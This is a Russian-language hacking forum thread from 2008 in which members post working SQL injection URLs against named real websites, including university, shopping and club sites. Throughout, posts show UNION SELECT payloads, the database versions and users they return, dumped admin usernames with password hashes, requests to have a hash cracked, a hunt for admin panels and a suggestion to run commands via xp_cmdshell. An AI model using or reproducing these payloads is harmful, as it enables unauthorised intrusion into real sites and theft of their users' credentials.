ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.12.2008, 04:15
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223
Репутация:
7
|
|
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16/*
Вытащил таблицу с колонками а он пишет:
Table 'suggest.cms_users' doesn't exist
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms_use rs+limit+0,1/*
cms_users:email
cms_users  assword
cms_users:username
|
|
|
31.12.2008, 05:58
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Пройдёмся по магазинчикам!
http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS
Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156
http://www.cafegadgets.com/advanced_search_result.php?keywords=d2&search_in_d escription=1&categories_id=&inc_subcat=1&manufactu rers_id=-94+union+select+concat_ws(0x3a3a,version(),user(), database())--
5.0.67-community-log
cafe_cafe@localhost
cafe_cafeindia Webstore
|
|
|
|
31.12.2008, 06:44
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
vladvk,
Правильно так:
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms.cms _users+limit+0,1/*
|
|
|
|
31.12.2008, 11:25
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Код:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? )) |
|
|
|
31.12.2008, 14:53
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от Gemini12
Код:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? )) Дальше смотришь все таблицы в information_schema.
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables)--
Microsoft OLE DB Provider for SQL Server ошибка '80040e07'
Syntax error converting the nvarchar value 'tbl_comps' to a column of data type int.
/reviews/default.asp, line 40
Чтобы дальше смотреть используем NOT+IN
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables+where+table_name+NOT+IN('t bl_comps'))--
Ну и так дальше.
|
|
|
|
31.12.2008, 14:59
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от ILYAtirtir
Дальше смотришь все таблицы в information_schema.
Чтобы дальше смотреть используем NOT+IN
Ну и так дальше.
умный да? я это уже использовал, как думаешь я дошел до 'vacancy'...
|
|
|
|
01.01.2009, 03:44
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Новогодний диз=)
Код:
http://www.ztopclub.ru/afisha/?view=-1+union+select+1,2,3,4,5,concat_ws(0x3a,login,passwd),7,8,9,10,11+from+users--
Логин/пасс:
Код:
arius:0e2ff58f89a19e0750d33c2af5d605c6
---------------------------------------------------
The End!
Последний раз редактировалось -m0rgan-; 01.01.2009 в 03:46..
|
|
|
|
31.12.2008, 13:57
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от spherics
Пройдёмся по магазинчикам!
[B]http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS
Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156
Код:
http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws(0x3a,userid,Name,Password,Email,Tel_Off,Tel_Res,Mobile,Enable,Creation_Date,Last_Mod_Date),4+from+User_Master+where+id='1'--
admin:F1A61D77BD363820BCAB7093B433360876BDDC34
хэш в пм плз, зарание спс 
Да, и еще, кто админку нашел?
Последний раз редактировалось Gemini12; 31.12.2008 в 14:01..
|
|
|
|
31.12.2008, 12:20
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
http://www.amazingsportsphotos.com/shop/insertorder.cfm?CFID=3371&CFTOKEN=53570656+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
5.0.67-community-nt-log
Код:
http://www.appointmentsatfive.com/insertorder.cfm?CFID=102&CFTOKEN=94729224+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
5.0.67-community-nt-log
 |
|
|
|
31.12.2008, 18:00
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
